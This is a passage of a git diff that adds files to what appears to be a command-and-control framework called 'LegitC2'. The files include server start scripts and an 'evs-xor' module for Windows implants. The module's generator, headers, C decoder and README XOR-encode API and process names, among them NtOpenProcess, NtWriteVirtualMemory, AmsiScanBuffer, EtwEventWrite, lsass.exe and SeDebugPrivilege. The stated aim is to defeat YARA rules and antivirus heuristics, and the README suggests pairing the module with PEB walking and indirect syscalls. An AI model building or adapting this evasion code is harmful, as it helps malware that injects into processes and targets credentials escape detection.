Write-Error "cert.pem / key.pem not found — run gen_cert.ps1 first" + exit 1 + } + Write-Host "[start] PROD mode — HTTPS 0.0.0.0:8443" + & "venv\Scripts\python.exe" -m uvicorn main:app ` + --host 0.0.0.0 ` + --port 8443 ` + --ssl-certfile cert.pem ` + --ssl-keyfile key.pem ` + --log-level info +} diff --git a/server/start.sh b/server/start.sh new file mode 100644 index 0000000..fa5f100 --- /dev/null +++ b/server/start.sh @@ -0,0 +1,32 @@ +#!/usr/bin/env bash +# LegitC2 team server — production start (Linux VPS) +# Usage: ./start.sh [--dev] +# +# --dev : HTTP on 8000, no SSL (local testing) +# default: HTTPS on 8443 with cert.pem / key.pem + +set -e +cd "$(dirname "$0")" + +DEV=0 +[[ "${1:-}" == "--dev" ]] && DEV=1 + +if [[ $DEV -eq 1 ]]; then + echo "[start] DEV mode — HTTP 0.0.0.0:8000" + exec uvicorn main:app \ + --host 0.0.0.0 \ + --port 8000 \ + --log-level info +else + if [[ ! -f cert.pem || ! -f key.pem ]]; then + echo "[error] cert.pem / key.pem not found — run gen_cert.sh first" + exit 1 + fi + echo "[start] PROD mode — HTTPS 0.0.0.0:8443" + exec uvicorn main:app \ + --host 0.0.0.0 \ + --port 8443 \ + --ssl-certfile cert.pem \ + --ssl-keyfile key.pem \ + --log-level info +fi diff --git a/start_all.ps1 b/start_all.ps1 new file mode 100644 index 0000000..763141c --- /dev/null +++ b/start_all.ps1 @@ -0,0 +1,66 @@ +# LegitC2 — Lance le serveur + l'UI en arrière-plan +# Usage: +# .\start_all.ps1 -> Serveur HTTPS 8443 + UI (npm run dev) +# .\start_all.ps1 -Dev -> Serveur HTTP 8000 + UI (npm run dev) +# Ctrl+C pour tout arrêter + +param([switch]$Dev) + +$root = Split-Path -Parent $MyInvocation.MyCommand.Path + +# --- Tuer les instances existantes --- +foreach ($port in @(8443, 8000, 3000)) { + $pids = (netstat -ano | Select-String ":$port\s") | + ForEach-Object { ($_ -split '\s+')[-1] } | + Sort-Object -Unique + foreach ($pid in $pids) { + if ($pid -match '^\d+$' -and $pid -ne '0') { + Stop-Process -Id $pid -Force -ErrorAction SilentlyContinue + Write-Host "[*] Processus $pid sur :$port arrêté." -ForegroundColor DarkYellow + } + } +} +Start-Sleep -Milliseconds 500 + +# --- Serveur --- +Write-Host "[*] Démarrage du serveur..." -ForegroundColor Cyan +if ($Dev) { + $serverJob = Start-Job -ScriptBlock { + param($r) + Set-Location "$r\server" + & "venv\Scripts\python.exe" -m uvicorn main:app --host 0.0.0.0 --port 8000 --log-level info + } -ArgumentList $root +} else { + $serverJob = Start-Job -ScriptBlock { + param($r) + Set-Location "$r\server" + & "venv\Scripts\python.exe" -m uvicorn main:app --host 0.0.0.0 --port 8443 --ssl-certfile cert.pem --ssl-keyfile key.pem --log-level info + } -ArgumentList $root +} + +# --- UI --- +Write-Host "[*] Démarrage de l'UI..." -ForegroundColor Cyan +$uiJob = Start-Job -ScriptBlock { + param($r) + Set-Location "$r\ui" + npm run dev +} -ArgumentList $root + +Write-Host "[+] Serveur (Job $($serverJob.Id)) et UI (Job $($uiJob.Id)) lancés en arrière-plan." -ForegroundColor Green +Write-Host " Logs en direct : Receive-Job -Id -Keep" -ForegroundColor DarkGray +Write-Host " Arrêter tout : Stop-Job $($serverJob.Id), $($uiJob.Id)" -ForegroundColor DarkGray +Write-Host "" +Write-Host "[*] Affichage des logs (Ctrl+C pour quitter)..." -ForegroundColor Yellow + +try { + while ($true) { + Receive-Job -Job $serverJob | ForEach-Object { Write-Host "[server] $_" } + Receive-Job -Job $uiJob | ForEach-Object { Write-Host "[ui] $_" } + Start-Sleep -Milliseconds 500 + } +} finally { + Write-Host "`n[*] Arrêt..." -ForegroundColor Yellow + Stop-Job $serverJob, $uiJob + Remove-Job $serverJob, $uiJob + Write-Host "[+] Arrêté." -ForegroundColor Green +} diff --git a/techniques/evs-xor/Makefile b/techniques/evs-xor/Makefile new file mode 100644 index 0000000..5d899d3 --- /dev/null +++ b/techniques/evs-xor/Makefile @@ -0,0 +1,36 @@ +CC = x86_64-w64-mingw32-gcc +PY = python3 +CFLAGS = -O2 -Wall -Wextra \ + -Iinclude \ + -fno-asynchronous-unwind-tables \ + -fno-ident \ + -fno-stack-protector + +SRC = src/evs.c src/demo.c +OBJ = $(patsubst src/%.c, build/%.o, $(SRC)) +TARGET = build/demo.exe +HEADER = include/evs_strings.h + +all: $(HEADER) build $(TARGET) + +$(HEADER): strings.txt gen_evs.py + $(PY) gen_evs.py strings.txt -o $(HEADER) + +build: + mkdir -p build + +build/%.o: src/%.c $(HEADER) + $(CC) $(CFLAGS) -c $< -o $@ + +$(TARGET): $(OBJ) + $(CC) $(CFLAGS) $(OBJ) -o $@ + +# Rebuild with a new random key +rekey: + rm -f $(HEADER) + $(MAKE) + +clean: + rm -rf build $(HEADER) + +.PHONY: all rekey clean diff --git a/techniques/evs-xor/README.md b/techniques/evs-xor/README.md new file mode 100644 index 0000000..11e5391 --- /dev/null +++ b/techniques/evs-xor/README.md @@ -0,0 +1,166 @@ +# evs-xor + +Compile-time XOR string obfuscation for Windows implants. Prevents API/DLL name strings from appearing in `.rdata`, defeating static YARA rules that match literal API names. + +Extracted from [KHAOS C2](https://github.com/28Zaaky/khaos-c2). + +--- + +## The problem + +Any implant that calls `GetProcAddress(ntdll, "NtOpenProcess")` has the string `"NtOpenProcess"` sitting in `.rdata`. A two-line YARA rule catches every implant that uses that API by name. Same for `"AmsiScanBuffer"`, `"EtwEventWrite"`, `"lsass.exe"`, `"SeDebugPrivilege"`, etc. + +``` +strings build/implant.exe | grep NtOpenProcess + → NtOpenProcess ← instant YARA hit +``` + +--- + +## How EVS XOR solves it + +**Build time** (Python generator): + +1. `gen_evs.py` reads your string table (`strings.txt`). +2. Picks a random 1-byte XOR key (`secrets.randbelow(256)`, non-zero). +3. XOR-encodes each string byte-by-byte. +4. Writes `include/evs_strings.h` with static byte arrays + `EVS_KEY` define. + +Key changes on every build → every byte array changes → no static YARA rule survives a rebuild. + +**Runtime** (C decoder): + +```c +char buf[16] = {0}; +EVS_D(buf, EVS_dll_ntdll); // XOR decode "ntdll.dll" into buf at runtime +HMODULE h = GetModuleHandleA(buf); +SecureZeroMemory(buf, sizeof(buf)); // wipe from stack +``` + +**Why `noinline`:** + +One hundred `EVS_D()` calls inlined = one hundred short identical XOR loops in `.text`. ML-based AV heuristics flag high density of identical short loops as a packing / shellcode signature. `__attribute__((noinline))` keeps a single function body — one code pattern, not one hundred. + +--- + +## Usage + +### 1. Add strings to `strings.txt` + +``` +# Format: plaintext_value C_identifier_suffix + +ntdll.dll dll_ntdll +NtOpenProcess fn_NtOpenProcess +AmsiScanBuffer fn_AmsiScanBuffer +lsass.exe str_lsass +``` + +### 2. Generate header + +```bash +python gen_evs.py strings.txt -o include/evs_strings.h +# or just: make +``` + +Output: `include/evs_strings.h` with randomized key + encoded arrays. + +### 3. Include and use + +```c +#include "evs.h" +#include "evs_strings.h" + +// decode at the call site, use, wipe +char dll[16] = {0}; +EVS_D(dll, EVS_dll_ntdll); +HMODULE h = GetModuleHandleA(dll); +SecureZeroMemory(dll, sizeof(dll)); + +char fn[24] = {0}; +EVS_D(fn, EVS_fn_NtOpenProcess); +FARPROC p = GetProcAddress(h, fn); +SecureZeroMemory(fn, sizeof(fn)); +``` + +### Rebuild with new key + +```bash +make rekey # deletes evs_strings.h, regenerates with a new random key, rebuilds +``` + +--- + +## Build + +```bash +make +./build/demo.exe +``` + +Expected output: + +``` +[*] EVS_KEY = 0xCC (random per build — changes every make) + +[*] Encoded arrays in .rodata (no plaintext): + EVS_dll_ntdll A2 B8 A8 A0 A0 E2 A8 A0 A0 + EVS_fn_NtOpenProcess 82 B8 83 BC A9 A2 9C BE A3 AF ... + ... + +[*] Decoded at runtime: + dll: ntdll.dll + api: NtOpenProcess + api: EtwEventWrite + ... + +[+] GetModuleHandleA(ntdll.dll) = 0x00007ffe2fc40000 +[+] GetProcAddress(NtOpenProcess) = 0x00007ffe2fda0510 +[+] EVS XOR working — no plaintext strings, APIs resolved correctly +``` + +Verify no plaintext leaks: + +```powershell +$b = [IO.File]::ReadAllBytes("build\demo.exe") +$t = [Text.Encoding]::Latin1.GetString($b) +[regex]::Matches($t,'[!-~]{5,}') | Where Value -match "ntdll|NtOpen|AmsiScan" +# → 0 results +``` + +--- + +## gen_evs.py options + +``` +usage: gen_evs.py [strings.txt] [-o header.h] [-k 0xNN] + +positional: + strings.txt string table file (default: strings.txt) + +optional: + -o PATH output header path (default: include/evs_strings.h) + -k 0xNN fixed XOR key — useful for testing; random by default +``` + +--- + +## Limitations + +- **Single-byte XOR** — simple but sufficient to defeat static string matching. Not cryptographically strong. A determined analyst can brute-force 255 keys in milliseconds. The goal is defeating *static* AV/YARA, not a human analyst. +- **Key in binary** — `EVS_KEY` is a literal in the compiled binary. Visible in a hex dump. Sufficient for static scanning evasion; not for obfuscating against reverse engineering. +- **`SecureZeroMemory` is advisory** — compiler may optimize it away with LTO. Use `volatile` wipes or `explicit_bzero` in hardened production code. +- **Import table still names `KERNEL32.dll`** — any PE that calls `GetProcAddress` will. Replace with a PEB walk to eliminate even that reference. + +--- + +## Operational notes + +- **Stack buffer sizing**: `EVS_D(buf, EVS_foo)` writes `sizeof(EVS_foo) + 1` bytes. Allocate `sizeof(EVS_foo) + 1` minimum. +- **Thread safety**: `evs_dec()` is stateless — safe to call from multiple threads. +- **Integration with PEB walk**: pair EVS with a PEB module walker to resolve DLLs without any string in the import table or `.rdata`. +- **Integration with indirect syscalls**: EVS encodes Nt* function names passed to `sc_ssn()` — no plaintext syscall names appear even in the SSN resolver. + +--- + +*Part of [KHAOS C2](https://github.com/28Zaaky/khaos-c2) — by [28Zaaky](https://github.com/28Zaaky)* diff --git a/techniques/evs-xor/build/demo.exe b/techniques/evs-xor/build/demo.exe new file mode 100644 index 0000000..9320279 Binary files /dev/null and b/techniques/evs-xor/build/demo.exe differ diff --git a/techniques/evs-xor/build/demo.o b/techniques/evs-xor/build/demo.o new file mode 100644 index 0000000..f94d843 Binary files /dev/null and b/techniques/evs-xor/build/demo.o differ diff --git a/techniques/evs-xor/build/evs.o b/techniques/evs-xor/build/evs.o new file mode 100644 index 0000000..675977a Binary files /dev/null and b/techniques/evs-xor/build/evs.o differ diff --git a/techniques/evs-xor/gen_evs.py b/techniques/evs-xor/gen_evs.py new file mode 100644 index 0000000..17c2d6e --- /dev/null +++ b/techniques/evs-xor/gen_evs.py @@ -0,0 +1,114 @@ +#!/usr/bin/env python3 +""" +gen_evs.py — compile-time XOR string obfuscator for Windows implants. + +Reads a two-column string table, encodes each string with a per-build +random XOR key, and writes a C header with static byte arrays. + +Usage: + python gen_evs.py [strings.txt] [-o include/evs_strings.h] [-k 0xNN] + +String table format: + plaintext_string C_identifier_suffix + # comment lines and blank lines are ignored + +Output: + C header with EVS_KEY define, EVS_[] arrays, and EVS_D() macro. + +Extracted from KHAOS C2 — https://github.com/28Zaaky/khaos-c2 +""" +import os +import sys +import secrets +import argparse + + +def encode(plaintext: str, key: int) -> list: + return [b ^ key for b in plaintext.encode("latin-1")] + + +def load_strings(path: str) -> list: + pairs = [] + with open(path) as f: + for line in f: + line = line.strip() + if not line or line.startswith("#"): + continue + parts = line.split() + if len(parts) < 2: + sys.exit(f"bad line in {path!r}: {line!r} (expected: plaintext identifier)") + pairs.append((parts[0], parts[1])) + return pairs + + +def main(): + ap = argparse.ArgumentParser(description=__doc__, + formatter_class=argparse.RawDescriptionHelpFormatter) + ap.add_argument("strings", nargs="?", default="strings.txt", + help="string table file (default: strings.txt)") + ap.add_argument("-o", default="include/evs_strings.h", + help="output header path (default: include/evs_strings.h)") + ap.add_argument("-k", default=None, metavar="0xNN", + help="fixed XOR key in hex (default: random per run)") + args = ap.parse_args() + + if args.k: + key = int(args.k, 16) & 0xFF + if key == 0: + sys.exit("key 0x00 is the XOR identity — use a non-zero value") + else: + key = secrets.randbelow(256) + while key == 0: + key = secrets.randbelow(256) + + pairs = load_strings(args.strings) + + lines = [ + "/* AUTO-GENERATED by gen_evs.py — do not edit.", + " * EVS_KEY is randomised every build; all byte arrays change.", + " * Defeats static YARA rules that match encoded API/DLL names.", + " */", + "#ifndef EVS_STRINGS_H", + "#define EVS_STRINGS_H", + "", + f"#define EVS_KEY 0x{key:02x}u", + "", + ] + + for plaintext, suffix in pairs: + enc = encode(plaintext, key) + arr = ", ".join(f"0x{b:02x}" for b in enc) + lines.append( + f"static const unsigned char EVS_{suffix}[{len(enc)}]" + f" = {{ {arr} }}; /* {plaintext} */" + ) + + lines += [ + "", + "/* Runtime XOR decoder — defined in src/evs.c.", + " * noinline: one code pattern in .text, not N inline XOR loops.", + " * ML-based AV heuristics flag many identical short loops;", + " * a single called function does not match that signature. */", + "#ifndef EVS_DEC_DECL", + "#define EVS_DEC_DECL", + "#include ", + "extern void evs_dec(char *out, const unsigned char *enc, size_t n);", + "#define EVS_D(out, arr) evs_dec((out), (arr), sizeof(arr))", + "#endif", + "", + "#endif /* EVS_STRINGS_H */", + "", + ] + + out_dir = os.path.dirname(args.o) + if out_dir: + os.makedirs(out_dir, exist_ok=True) + + with open(args.o, "w") as f: + f.write("\n".join(lines)) + + print(f"[ok] {args.o} key=0x{key:02x} {len(pairs)} strings encoded") + + +if __name__ == "__main__": + main() diff --git a/techniques/evs-xor/include/evs.h b/techniques/evs-xor/include/evs.h new file mode 100644 index 0000000..7157ac0 --- /dev/null +++ b/techniques/evs-xor/include/evs.h @@ -0,0 +1,35 @@ +#pragma once +#include + +/* + * EVS XOR — compile-time string obfuscation for Windows implants. + * + * Problem: strings like "ntdll.dll", "NtOpenProcess", "AmsiScanBuffer" in + * .rdata are direct YARA match targets — one rule catches every implant that + * touches these APIs by name. + * + * Solution: encode strings at compile time with a random per-build XOR key. + * No plaintext appears in .rdata. Key changes every build → static YARA fails. + * + * Workflow: + * 1. Add strings to strings.txt + * 2. Run: python gen_evs.py (auto-called by `make`) + * 3. #include "evs_strings.h" in files that need string decoding + * 4. Decode at runtime, use, then wipe: + * + * char buf[16] = {0}; + * EVS_D(buf, EVS_dll_ntdll); + * HMODULE h = GetModuleHandleA(buf); + * SecureZeroMemory(buf, sizeof(buf)); + * + * Runtime cost: one small XOR loop per decode call. + * Stack buffers for decoded strings are caller-managed. + */ + +/* Runtime decoder (defined in src/evs.c). + * __attribute__((noinline)) in the .c ensures one code pattern, not N copies. */ +void evs_dec(char *out, const unsigned char *enc, size_t n); + +/* Decode EVS_ array into caller-provided buffer. + * Buffer must be at least sizeof(EVS_) + 1 bytes (evs_dec appends NUL). */ +#define EVS_D(out, arr) evs_dec((out), (arr), sizeof(arr)) diff --git a/techniques/evs-xor/include/evs_strings.h b/techniques/evs-xor/include/evs_strings.h new file mode 100644 index 0000000..e57dfac --- /dev/null +++ b/techniques/evs-xor/include/evs_strings.h @@ -0,0 +1,52 @@ +/* AUTO-GENERATED by gen_evs.py do not edit. + * EVS_KEY is randomised every build; all byte arrays change. + * Defeats static YARA rules that match encoded API/DLL names. + */ +#ifndef EVS_STRINGS_H +#define EVS_STRINGS_H + +#define EVS_KEY 0xccu + +static const unsigned char EVS_dll_ntdll[9] = { 0xa2, 0xb8, 0xa8, 0xa0, 0xa0, 0xe2, 0xa8, 0xa0, 0xa0 }; /* ntdll.dll */ +static const unsigned char EVS_dll_kernel32[12] = { 0xa7, 0xa9, 0xbe, 0xa2, 0xa9, 0xa0, 0xff, 0xfe, 0xe2, 0xa8, 0xa0, 0xa0 }; /* kernel32.dll */ +static const unsigned char EVS_dll_kernelbase[14] = { 0x87, 0xa9, 0xbe, 0xa2, 0xa9, 0xa0, 0x8e, 0xad, 0xbf, 0xa9, 0xe2, 0xa8, 0xa0, 0xa0 }; /* KernelBase.dll */ +static const unsigned char EVS_dll_advapi32[12] = { 0xad, 0xa8, 0xba, 0xad, 0xbc, 0xa5, 0xff, 0xfe, 0xe2, 0xa8, 0xa0, 0xa0 }; /* advapi32.dll */ +static const unsigned char EVS_dll_amsi[8] = { 0xad, 0xa1, 0xbf, 0xa5, 0xe2, 0xa8, 0xa0, 0xa0 }; /* amsi.dll */ +static const unsigned char EVS_fn_NtOpenProcess[13] = { 0x82, 0xb8, 0x83, 0xbc, 0xa9, 0xa2, 0x9c, 0xbe, 0xa3, 0xaf, 0xa9, 0xbf, 0xbf }; /* NtOpenProcess */ +static const unsigned char EVS_fn_NtAllocateVirtualMemory[23] = { 0x82, 0xb8, 0x8d, 0xa0, 0xa0, 0xa3, 0xaf, 0xad, 0xb8, 0xa9, 0x9a, 0xa5, 0xbe, 0xb8, 0xb9, 0xad, 0xa0, 0x81, 0xa9, 0xa1, 0xa3, 0xbe, 0xb5 }; /* NtAllocateVirtualMemory */ +static const unsigned char EVS_fn_NtWriteVirtualMemory[20] = { 0x82, 0xb8, 0x9b, 0xbe, 0xa5, 0xb8, 0xa9, 0x9a, 0xa5, 0xbe, 0xb8, 0xb9, 0xad, 0xa0, 0x81, 0xa9, 0xa1, 0xa3, 0xbe, 0xb5 }; /* NtWriteVirtualMemory */ +static const unsigned char EVS_fn_NtProtectVirtualMemory[22] = { 0x82, 0xb8, 0x9c, 0xbe, 0xa3, 0xb8, 0xa9, 0xaf, 0xb8, 0x9a, 0xa5, 0xbe, 0xb8, 0xb9, 0xad, 0xa0, 0x81, 0xa9, 0xa1, 0xa3, 0xbe, 0xb5 }; /* NtProtectVirtualMemory */ +static const unsigned char EVS_fn_NtFreeVirtualMemory[19] = { 0x82, 0xb8, 0x8a, 0xbe, 0xa9, 0xa9, 0x9a, 0xa5, 0xbe, 0xb8, 0xb9, 0xad, 0xa0, 0x81, 0xa9, 0xa1, 0xa3, 0xbe, 0xb5 }; /* NtFreeVirtualMemory */ +static const unsigned char EVS_fn_NtCreateThreadEx[16] = { 0x82, 0xb8, 0x8f, 0xbe, 0xa9, 0xad, 0xb8, 0xa9, 0x98, 0xa4, 0xbe, 0xa9, 0xad, 0xa8, 0x89, 0xb4 }; /* NtCreateThreadEx */ +static const unsigned char EVS_fn_NtClose[7] = { 0x82, 0xb8, 0x8f, 0xa0, 0xa3, 0xbf, 0xa9 }; /* NtClose */ +static const unsigned char EVS_fn_NtReadVirtualMemory[19] = { 0x82, 0xb8, 0x9e, 0xa9, 0xad, 0xa8, 0x9a, 0xa5, 0xbe, 0xb8, 0xb9, 0xad, 0xa0, 0x81, 0xa9, 0xa1, 0xa3, 0xbe, 0xb5 }; /* NtReadVirtualMemory */ +static const unsigned char EVS_fn_NtContinue[10] = { 0x82, 0xb8, 0x8f, 0xa3, 0xa2, 0xb8, 0xa5, 0xa2, 0xb9, 0xa9 }; /* NtContinue */ +static const unsigned char EVS_fn_NtWaitForSingleObject[21] = { 0x82, 0xb8, 0x9b, 0xad, 0xa5, 0xb8, 0x8a, 0xa3, 0xbe, 0x9f, 0xa5, 0xa2, 0xab, 0xa0, 0xa9, 0x83, 0xae, 0xa6, 0xa9, 0xaf, 0xb8 }; /* NtWaitForSingleObject */ +static const unsigned char EVS_fn_NtPVM[22] = { 0x82, 0xb8, 0x9c, 0xbe, 0xa3, 0xb8, 0xa9, 0xaf, 0xb8, 0x9a, 0xa5, 0xbe, 0xb8, 0xb9, 0xad, 0xa0, 0x81, 0xa9, 0xa1, 0xa3, 0xbe, 0xb5 }; /* NtProtectVirtualMemory */ +static const unsigned char EVS_fn_RtlCaptureContext[17] = { 0x9e, 0xb8, 0xa0, 0x8f, 0xad, 0xbc, 0xb8, 0xb9, 0xbe, 0xa9, 0x8f, 0xa3, 0xa2, 0xb8, 0xa9, 0xb4, 0xb8 }; /* RtlCaptureContext */ +static const unsigned char EVS_fn_RtlUserThreadStart[18] = { 0x9e, 0xb8, 0xa0, 0x99, 0xbf, 0xa9, 0xbe, 0x98, 0xa4, 0xbe, 0xa9, 0xad, 0xa8, 0x9f, 0xb8, 0xad, 0xbe, 0xb8 }; /* RtlUserThreadStart */ +static const unsigned char EVS_fn_EtwEventWrite[13] = { 0x89, 0xb8, 0xbb, 0x89, 0xba, 0xa9, 0xa2, 0xb8, 0x9b, 0xbe, 0xa5, 0xb8, 0xa9 }; /* EtwEventWrite */ +static const unsigned char EVS_fn_EtwTiLogOpenProcess[19] = { 0x89, 0xb8, 0xbb, 0x98, 0xa5, 0x80, 0xa3, 0xab, 0x83, 0xbc, 0xa9, 0xa2, 0x9c, 0xbe, 0xa3, 0xaf, 0xa9, 0xbf, 0xbf }; /* EtwTiLogOpenProcess */ +static const unsigned char EVS_fn_EtwTiLogReadWriteVm[19] = { 0x89, 0xb8, 0xbb, 0x98, 0xa5, 0x80, 0xa3, 0xab, 0x9e, 0xa9, 0xad, 0xa8, 0x9b, 0xbe, 0xa5, 0xb8, 0xa9, 0x9a, 0xa1 }; /* EtwTiLogReadWriteVm */ +static const unsigned char EVS_fn_EtwTiLogDuplicateHandle[23] = { 0x89, 0xb8, 0xbb, 0x98, 0xa5, 0x80, 0xa3, 0xab, 0x88, 0xb9, 0xbc, 0xa0, 0xa5, 0xaf, 0xad, 0xb8, 0xa9, 0x84, 0xad, 0xa2, 0xa8, 0xa0, 0xa9 }; /* EtwTiLogDuplicateHandle */ +static const unsigned char EVS_fn_AmsiScanBuffer[14] = { 0x8d, 0xa1, 0xbf, 0xa5, 0x9f, 0xaf, 0xad, 0xa2, 0x8e, 0xb9, 0xaa, 0xaa, 0xa9, 0xbe }; /* AmsiScanBuffer */ +static const unsigned char EVS_fn_AmsiScanString[14] = { 0x8d, 0xa1, 0xbf, 0xa5, 0x9f, 0xaf, 0xad, 0xa2, 0x9f, 0xb8, 0xbe, 0xa5, 0xa2, 0xab }; /* AmsiScanString */ +static const unsigned char EVS_str_svchost[11] = { 0xbf, 0xba, 0xaf, 0xa4, 0xa3, 0xbf, 0xb8, 0xe2, 0xa9, 0xb4, 0xa9 }; /* svchost.exe */ +static const unsigned char EVS_str_explorer[12] = { 0xa9, 0xb4, 0xbc, 0xa0, 0xa3, 0xbe, 0xa9, 0xbe, 0xe2, 0xa9, 0xb4, 0xa9 }; /* explorer.exe */ +static const unsigned char EVS_str_lsass[9] = { 0xa0, 0xbf, 0xad, 0xbf, 0xbf, 0xe2, 0xa9, 0xb4, 0xa9 }; /* lsass.exe */ +static const unsigned char EVS_str_RuntimeBroker[17] = { 0x9e, 0xb9, 0xa2, 0xb8, 0xa5, 0xa1, 0xa9, 0x8e, 0xbe, 0xa3, 0xa7, 0xa9, 0xbe, 0xe2, 0xa9, 0xb4, 0xa9 }; /* RuntimeBroker.exe */ +static const unsigned char EVS_str_SeDebugPrivilege[16] = { 0x9f, 0xa9, 0x88, 0xa9, 0xae, 0xb9, 0xab, 0x9c, 0xbe, 0xa5, 0xba, 0xa5, 0xa0, 0xa9, 0xab, 0xa9 }; /* SeDebugPrivilege */ +static const unsigned char EVS_str_SeImpersonatePrivilege[22] = { 0x9f, 0xa9, 0x85, 0xa1, 0xbc, 0xa9, 0xbe, 0xbf, 0xa3, 0xa2, 0xad, 0xb8, 0xa9, 0x9c, 0xbe, 0xa5, 0xba, 0xa5, 0xa0, 0xa9, 0xab, 0xa9 }; /* SeImpersonatePrivilege */ + +/* Runtime XOR decoder defined in src/evs.c. + * noinline: one code pattern in .text, not N inline XOR loops. + * ML-based AV heuristics flag many identical short loops; + * a single called function does not match that signature. */ +#ifndef EVS_DEC_DECL +#define EVS_DEC_DECL +#include +extern void evs_dec(char *out, const unsigned char *enc, size_t n); +#define EVS_D(out, arr) evs_dec((out), (arr), sizeof(arr)) +#endif + +#endif /* EVS_STRINGS_H */ diff --git a/techniques/evs-xor/src/demo.c b/techniques/evs-xor/src/demo.c new file mode 100644 index 0000000..7bf327a --- /dev/null +++ b/techniques/evs-xor/src/demo.c @@ -0,0 +1,109 @@ +#include "evs.h" +#include "evs_strings.h" +#include +#include +#include + +/* + * Demo: + * 1. Show that encoded arrays contain no plaintext bytes (strings tool finds nothing). + * 2. Decode at runtime via EVS_D(). + * 3. Resolve real APIs using decoded names — no plaintext string ever in .rdata. + * 4. Wipe decoded buffers with SecureZeroMemory after use. + * + * Verify no plaintext leaks: + * strings build/demo.exe | grep -iE "ntdll|NtOpen|AmsiScan" + * → no results expected + */ + +static void print_hex(const char *label, const unsigned char *arr, size_t n) +{ + printf(" %-28s ", label); + for (size_t i = 0; i < n && i < 10; i++) + printf("%02X ", arr[i]); + if (n > 10) printf("..."); + printf("\n"); +} + +int main(void) +{ + printf("[*] EVS_KEY = 0x%02X (random per build — changes every make)\n\n", EVS_KEY); + + /* --- Show raw encoded bytes: no plaintext recognizable --- */ + printf("[*] Encoded arrays in .rodata (no plaintext):\n"); + print_hex("EVS_dll_ntdll", EVS_dll_ntdll, sizeof(EVS_dll_ntdll)); + print_hex("EVS_fn_NtOpenProcess", EVS_fn_NtOpenProcess, sizeof(EVS_fn_NtOpenProcess)); + print_hex("EVS_fn_AmsiScanBuffer",EVS_fn_AmsiScanBuffer,sizeof(EVS_fn_AmsiScanBuffer)); + print_hex("EVS_fn_EtwEventWrite", EVS_fn_EtwEventWrite, sizeof(EVS_fn_EtwEventWrite)); + print_hex("EVS_str_lsass", EVS_str_lsass, sizeof(EVS_str_lsass)); + + /* --- Decode at runtime --- */ + printf("\n[*] Decoded at runtime:\n"); + + char dll_ntdll[16] = {0}; + char dll_kernel32[16] = {0}; + char dll_amsi[16] = {0}; + char fn_NtOpen[24] = {0}; + char fn_NtProt[28] = {0}; + char fn_EtwW[20] = {0}; + char fn_AmsiScan[20] = {0}; + char str_svchost[16] = {0}; + char str_lsass[16] = {0}; + char str_sedbg[24] = {0}; + + EVS_D(dll_ntdll, EVS_dll_ntdll); + EVS_D(dll_kernel32, EVS_dll_kernel32); + EVS_D(dll_amsi, EVS_dll_amsi); + EVS_D(fn_NtOpen, EVS_fn_NtOpenProcess); + EVS_D(fn_NtProt, EVS_fn_NtProtectVirtualMemory); + EVS_D(fn_EtwW, EVS_fn_EtwEventWrite); + EVS_D(fn_AmsiScan, EVS_fn_AmsiScanBuffer); + EVS_D(str_svchost, EVS_str_svchost); + EVS_D(str_lsass, EVS_str_lsass); + EVS_D(str_sedbg, EVS_str_SeDebugPrivilege); + + printf(" dll: %s\n", dll_ntdll); + printf(" dll: %s\n", dll_kernel32); + printf(" dll: %s\n", dll_amsi); + printf(" api: %s\n", fn_NtOpen); + printf(" api: %s\n", fn_NtProt); + printf(" api: %s\n", fn_EtwW); + printf(" api: %s\n", fn_AmsiScan); + printf(" process: %s\n", str_svchost); + printf(" process: %s\n", str_lsass); + printf(" privilege: %s\n", str_sedbg); + + /* --- Functional test: resolve real API via decoded name --- */ + printf("\n[*] API resolution via decoded names (no plaintext in IAT/rdata):\n"); + + HMODULE hntdll = GetModuleHandleA(dll_ntdll); + FARPROC fn_ntopen = hntdll ? GetProcAddress(hntdll, fn_NtOpen) : NULL; + FARPROC fn_ntprot = hntdll ? GetProcAddress(hntdll, fn_NtProt) : NULL; + FARPROC fn_etw = hntdll ? GetProcAddress(hntdll, fn_EtwW) : NULL; + + printf(" [%c] GetModuleHandleA(%s) = %p\n", + hntdll ? '+' : '!', dll_ntdll, (void *)hntdll); + printf(" [%c] GetProcAddress(%s) = %p\n", + fn_ntopen ? '+' : '!', fn_NtOpen, (void *)fn_ntopen); + printf(" [%c] GetProcAddress(%s) = %p\n", + fn_ntprot ? '+' : '!', fn_NtProt, (void *)fn_ntprot); + printf(" [%c] GetProcAddress(%s) = %p\n", + fn_etw ? '+' : '!', fn_EtwW, (void *)fn_etw); + + /* Wipe decoded strings — no plaintext lingers on the stack */ + SecureZeroMemory(dll_ntdll, sizeof(dll_ntdll)); + SecureZeroMemory(dll_kernel32, sizeof(dll_kernel32)); + SecureZeroMemory(fn_NtOpen, sizeof(fn_NtOpen)); + SecureZeroMemory(fn_NtProt, sizeof(fn_NtProt)); + SecureZeroMemory(fn_EtwW, sizeof(fn_EtwW)); + SecureZeroMemory(fn_AmsiScan, sizeof(fn_AmsiScan)); + SecureZeroMemory(str_lsass, sizeof(str_lsass)); + SecureZeroMemory(str_sedbg, sizeof(str_sedbg)); + + BOOL ok = hntdll && fn_ntopen && fn_ntprot && fn_etw; + printf("\n[%c] EVS XOR %s\n", ok ? '+' : '!', + ok ? "working — no plaintext strings, APIs resolved correctly" + : "FAIL — check output above"); + + return ok ? 0 : 1; +} diff --git a/techniques/evs-xor/src/evs.c b/techniques/evs-xor/src/evs.c new file mode 100644 index 0000000..1a456b9 --- /dev/null +++ b/techniques/evs-xor/src/evs.c @@ -0,0 +1,21 @@ +#include "evs.h" +#include "evs_strings.h" +#include + +/* + * Single XOR decoder — noinline so the compiler emits exactly one copy. + * + * Why noinline matters: + * 100+ EVS_D() calls with inline expansion = 100+ identical 3-instruction + * XOR loops scattered through .text. ML-based AV heuristics treat a high + * density of identical short loops as a shellcode-packing signature. + * One called function does not match that pattern. + */ +__attribute__((noinline)) +void evs_dec(char *out, const unsigned char *enc, size_t n) +{ + unsigned char k = EVS_KEY; + for (size_t i = 0; i < n; i++) + out[i] = (char)(enc[i] ^ k); + out[n] = '\0'; +} diff --git a/techniques/evs-xor/strings.txt b/techniques/evs-xor/strings.txt new file mode 100644 index 0000000..81fc581 --- /dev/null +++ b/techniques/evs-xor/strings.txt @@ -0,0 +1,45 @@ +# EVS string table — one entry per line: plaintext identifier_suffix +# Generated header will have EVS_ arrays. +# Run: python gen_evs.py (or make) + +# DLL names +ntdll.dll dll_ntdll +kernel32.dll dll_kernel32 +KernelBase.dll dll_kernelbase +advapi32.dll dll_advapi32 +amsi.dll dll_amsi + +# Nt* syscall stubs (ntdll) +NtOpenProcess fn_NtOpenProcess +NtAllocateVirtualMemory 